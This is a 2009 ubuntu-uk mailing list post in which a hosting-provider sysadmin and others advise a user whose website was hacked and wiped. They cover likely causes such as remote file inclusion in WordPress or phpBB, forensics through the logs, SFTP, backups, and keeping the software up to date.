[ubuntu-uk] Website Hacked.....

Sat Jun 27 20:39:02 BST 2009

All,

Some of you may or may not know that my latest job is working for a  
large UK hosting provider.

The comments in-line below are based on my experiences in trying to  
protect our cluster from hacking attempts.

Quoting Lucy <lucybridges at gmail.com>:

> 2009/6/27 Tony Arnold <tony.arnold at manchester.ac.uk>:
>> John,
>>
>> John wrote:
>>> I run a website, and there's about 2.5 gigs of information on there. The
>>> whole lot got deleted and the hackers put a picture of advertising who
>>> they were. I have managed to get the host to restore as much as they can
>>> back, well, they way they are trying to.

If your host cannot restore from backup, this was either a major hack  
(i.e. the hack happened a long time ago and therefore their current  
backups are all infected) or there are issues with their backup systems.

>>> What is worrying me, is the password was a really strong password, 100
>>> strong according to the password generator, and I was wondering, how
>>> they managed to get in. I cant help worry that it might be through my
>>> netbook. How do I check to see that my computer hasnt been hacked. I
>>> know Ubuntu has a virus checker, but the lst time I tried to use it, it
>>> was finding programs that were viruses, and these were programs in the
>>> Synaptic. I was not able to use it in the end, as I didnt know what was
>>> what. Also is there anything I can do to stop my notebook from being
>>> hacked.

A strong password is useless if the hack was carried out using a  
remote file include or a vulnerability in code that was on the website  
to elevate permissions.  From your other comments in the thread, I  
doubt that your netbook is compromised.  I'd lay the blame at the feet  
of Wordpress or similar.

>> Matt and Lucy have given you some good advice and pointers to how your
>> site got hacked. To really find out, you need to do some forensics, but
>> I realise the information you need may no longer be around.

Your hosting provider should be able to provide you with most of this  
information although it is not always easy to be 100% certain about  
when the attack occurred.

>> You need to determine the date & time of when the hack occurred.
>> Creation dates of new files put there by the hackers or modify dates of
>> anything they have changed will give you a clue.
>>
>> You then need to trawl the log files for the web server and look for any
>> unusual looking URLs that have been requested at about the time of the
>> hack. The path in the URL will give a clue as to where the weakness lies.
>>
>> I would also avoid using FTP and use SFTP (via ssh) instead. Strong
>> passwords help, but authentication via ssh keys would be even better.

Unfortunately, there are not a huge number of hosts that allow this as  
it would require enabling command-line access (no matter how  
restricted) to the servers.  As a Systems Administrator, end-users are  
_banned_ from accessing my systems because (to put it quite bluntly  
and this is not aimed at anyone in particular, certainly not on this  
mailing list!) the majority of end users simply do not know what they  
are doing when it comes to file ownership, permissions and what  
consitutes "Secure Code".

>> The concern here is that you restore everything and it just gets hacked
>> again because you haven't fixed the vulnerability.
>
> That's also good advice Tony, but sadly it sounds like John is on
> shared hosting and doesn't have access to the server or control how he
> uses it.
>
> John, my advice right now would be to continue bugging the ISP until
> they restore your sites from backups (although I'm guessing you won't
> get through to anyone until Monday now). That's assuming they do have
> the backups like you said.

We generally will provide as much information as we can to our clients  
as we are firm believers that if you point out the errors in the code,  
end-users learn and tend not to get hacked in future!  If your hosting  
provider are not doing this, then ask them why not.

> For the future, always make regular backups yourself and check that
> they work by restoring from them every now and then(you'd be surprised
> how many people skip this step). You might also consider looking for a
> different provider that uses SFTP.
>
> Also, I've noticed that the sites use cPanel. I've heard that this can
> also have security vulnerabilities if not configured properly, but I
> couldn't say more without someone more knowledgeable being able to
> check the configuration, which isn't likely to happen. It's not
> unusual at all for the ISP to be very cagey about security
> configurations and how this kind of event happened.

There have been issues with cPanel in the past and will probably be  
more in future however I'd pin my money on a remote file include issue  
in either WordPress or PHPBB for the cause of this one.

I'd check the versions of both that you are running and then either  
google for that version and security issues or read the CHANGELOG of  
the latest release and see what it fixes!

Kind regards,

Matt
-- 
Matthew Macdonald-Wallace
matthew at truthisfreedom.org.uk
http://www.truthisfreedom.org.uk/